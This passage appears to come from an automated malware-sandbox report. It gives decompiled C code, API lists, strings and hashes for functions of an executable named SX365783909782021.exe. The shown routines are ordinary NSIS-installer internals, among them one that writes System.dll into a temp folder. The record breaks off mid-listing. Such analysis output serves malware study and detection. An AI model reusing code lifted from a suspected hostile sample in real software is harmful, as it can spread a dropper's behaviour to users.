				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                        0x0040565a
                                                                                        0x00405671
                                                                                        0x00405679
                                                                                        0x00405679
                                                                                        0x00405681

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
                                                                                        • lstrcatA.KERNEL32(?,00409010), ref: 00405679
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405659
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 2659869361-3916508600
                                                                                        • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                        • Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
                                                                                        • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                        • Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 85%
                                                                                        			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                        0x00401ec7
                                                                                        0x00401ecf
                                                                                        0x00401ed4
                                                                                        0x00401ed9
                                                                                        0x00401edd
                                                                                        0x00401ee0
                                                                                        0x00401ee2
                                                                                        0x00401ee9
                                                                                        0x00401ef2
                                                                                        0x00401efa
                                                                                        0x00401efd
                                                                                        0x00401f12
                                                                                        0x00401f18
                                                                                        0x00401f2b
                                                                                        0x00401f34
                                                                                        0x00401f40
                                                                                        0x00401f45
                                                                                        0x00401f45
                                                                                        0x00401f2b
                                                                                        0x00401f48
                                                                                        0x00401b75
                                                                                        0x00401b75
                                                                                        0x00401efd
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                        • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1404258612-0
                                                                                        • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                        • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                        • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                        • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 67%
                                                                                        			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                        0x00401d29
                                                                                        0x00401d42
                                                                                        0x00401d4c
                                                                                        0x00401d51
                                                                                        0x00401d5c
                                                                                        0x00401d63
                                                                                        0x00401d75
                                                                                        0x00401d7b
                                                                                        0x00401d80
                                                                                        0x00401d8a
                                                                                        0x004024b8
                                                                                        0x00401561
                                                                                        0x00402833
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                        • GetDC.USER32(?), ref: 00401D22
                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                        • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CapsCreateDeviceFontIndirect
                                                                                        • String ID:
                                                                                        • API String ID: 3272661963-0
                                                                                        • Opcode ID: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                        • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                        • Opcode Fuzzy Hash: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                        • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403978, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                        0x0040397c
                                                                                        0x00403981
                                                                                        0x00403987
                                                                                        0x0040398c
                                                                                        0x0040398c
                                                                                        0x00403994
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040399c
                                                                                        0x004039a4
                                                                                        0x004039a6
                                                                                        0x004039ac
                                                                                        0x004039ac
                                                                                        0x004039ae
                                                                                        0x004039ba
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004039be
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004039c0
                                                                                        0x004039c5
                                                                                        0x004039ce
                                                                                        0x004039d4
                                                                                        0x004039d9
                                                                                        0x004039ed
                                                                                        0x004039f8
                                                                                        0x00403a10
                                                                                        0x00403a16
                                                                                        0x00403a1b
                                                                                        0x00403a23
                                                                                        0x00403a44
                                                                                        0x00403a44
                                                                                        0x00403a44
                                                                                        0x00403a25
                                                                                        0x00403a27
                                                                                        0x00403a27
                                                                                        0x00403a2b
                                                                                        0x00403a32
                                                                                        0x00403a32
                                                                                        0x00403a37
                                                                                        0x00403a3d
                                                                                        0x00403a3d
                                                                                        0x00000000
                                                                                        0x00403a27
                                                                                        0x004039db
                                                                                        0x004039e0
                                                                                        0x004039e9
                                                                                        0x004039e2
                                                                                        0x004039e2
                                                                                        0x004039e2
                                                                                        0x004039e0

                                                                                        APIs
                                                                                        • SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: TextWindow
                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 530164218-1075807775
                                                                                        • Opcode ID: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                        • Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
                                                                                        • Opcode Fuzzy Hash: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                        • Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}




                                                                                        0x00404e60
                                                                                        0x00404e85
                                                                                        0x00404ea5
                                                                                        0x00404ea8
                                                                                        0x00404eab
                                                                                        0x00404ec2
                                                                                        0x00404ec8
                                                                                        0x00404ecf
                                                                                        0x00404ed6
                                                                                        0x00404edd
                                                                                        0x00404ee2
                                                                                        0x00404ee8
                                                                                        0x00000000
                                                                                        0x00404ef8
                                                                                        0x00404e92
                                                                                        0x00404ee5
                                                                                        0x00404ee5
                                                                                        0x00000000
                                                                                        0x00404ee5
                                                                                        0x00404e9e
                                                                                        0x00404ea0
                                                                                        0x00000000
                                                                                        0x00404ea0
                                                                                        0x00404e66
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404e6d
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                        • CallWindowProcA.USER32 ref: 00404EF8
                                                                                          • Part of subcall function 00403F64: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F76
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                        • String ID:
                                                                                        • API String ID: 3748168415-3916222277
                                                                                        • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                        • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                        • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                        • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsvDA2D.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                        0x004024be
                                                                                        0x004024be
                                                                                        0x004024c1
                                                                                        0x004024dc
                                                                                        0x004024c3
                                                                                        0x004024c5
                                                                                        0x004024ca
                                                                                        0x004024d1
                                                                                        0x004024e3
                                                                                        0x0040265c
                                                                                        0x0040265c
                                                                                        0x004024e9
                                                                                        0x004024fb
                                                                                        0x004015a6
                                                                                        0x004015a8
                                                                                        0x00000000
                                                                                        0x004015ae
                                                                                        0x004015a8
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll, xrefs: 004024CA, 004024EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileWritelstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll
                                                                                        • API String ID: 427699356-3029964000
                                                                                        • Opcode ID: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                        • Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
                                                                                        • Opcode Fuzzy Hash: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                        • Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}







                                                                                        0x0040361b
                                                                                        0x00403623
                                                                                        0x0040362a
                                                                                        0x0040362d
                                                                                        0x0040362d
                                                                                        0x0040362f
                                                                                        0x00403634
                                                                                        0x0040363b
                                                                                        0x00403641
                                                                                        0x00403645
                                                                                        0x00403646
                                                                                        0x0040364e

                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\SX365783909782021.exe" ,00000000,74B5F560,004035F1,00000000,0040342D,00000000), ref: 00403634
                                                                                        • GlobalFree.KERNEL32 ref: 0040363B
                                                                                        Strings
                                                                                        • "C:\Users\user\Desktop\SX365783909782021.exe" , xrefs: 0040362C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Free$GlobalLibrary
                                                                                        • String ID: "C:\Users\user\Desktop\SX365783909782021.exe"
                                                                                        • API String ID: 1100898210-1856075400
                                                                                        • Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                        • Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
                                                                                        • Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                        • Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004056A0(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                        0x004056a1
                                                                                        0x004056ab
                                                                                        0x004056ad
                                                                                        0x004056b4
                                                                                        0x004056bc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004056bc
                                                                                        0x004056be
                                                                                        0x004056c3

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SX365783909782021.exe,C:\Users\user\Desktop\SX365783909782021.exe,80000000,00000003), ref: 004056A6
                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SX365783909782021.exe,C:\Users\user\Desktop\SX365783909782021.exe,80000000,00000003), ref: 004056B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrlen
                                                                                        • String ID: C:\Users\user\Desktop
                                                                                        • API String ID: 2709904686-1669384263
                                                                                        • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                        • Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
                                                                                        • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                        • Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 737610E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E737610E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x7376405c = _a8;
				 *0x73764060 = _a16;
				 *0x73764064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73764038, E73761556, _t52);
				_t43 =  *0x7376405c +  *0x7376405c * 4 << 2;
				_t17 = E7376123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E73761266(E737612AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E737612D1( *_t55 - 0x30, E7376123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x73764030;
								 *0x73764030 = _t31;
								E73761508(_t31 + 4,  *0x73764064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x73764030;
							if( *0x73764030 != 0) {
								E73761508( *0x73764064, _t34 + 4, _t43);
								_t37 =  *0x73764030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x73764030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                        0x737610e7
                                                                                        0x737610ef
                                                                                        0x73761103
                                                                                        0x7376110b
                                                                                        0x73761116
                                                                                        0x73761119
                                                                                        0x73761121
                                                                                        0x73761124
                                                                                        0x73761126
                                                                                        0x737611c4
                                                                                        0x737611d0
                                                                                        0x7376112c
                                                                                        0x7376112d
                                                                                        0x7376112d
                                                                                        0x73761130
                                                                                        0x73761131
                                                                                        0x73761134
                                                                                        0x73761203
                                                                                        0x73761206
                                                                                        0x7376119e
                                                                                        0x737611a4
                                                                                        0x737611ac
                                                                                        0x737611b1
                                                                                        0x737611b4
                                                                                        0x00000000
                                                                                        0x737611b4
                                                                                        0x73761209
                                                                                        0x7376120a
                                                                                        0x73761186
                                                                                        0x7376118c
                                                                                        0x73761194
                                                                                        0x00000000
                                                                                        0x73761194
                                                                                        0x73761152
                                                                                        0x73761153
                                                                                        0x7376115b
                                                                                        0x73761168
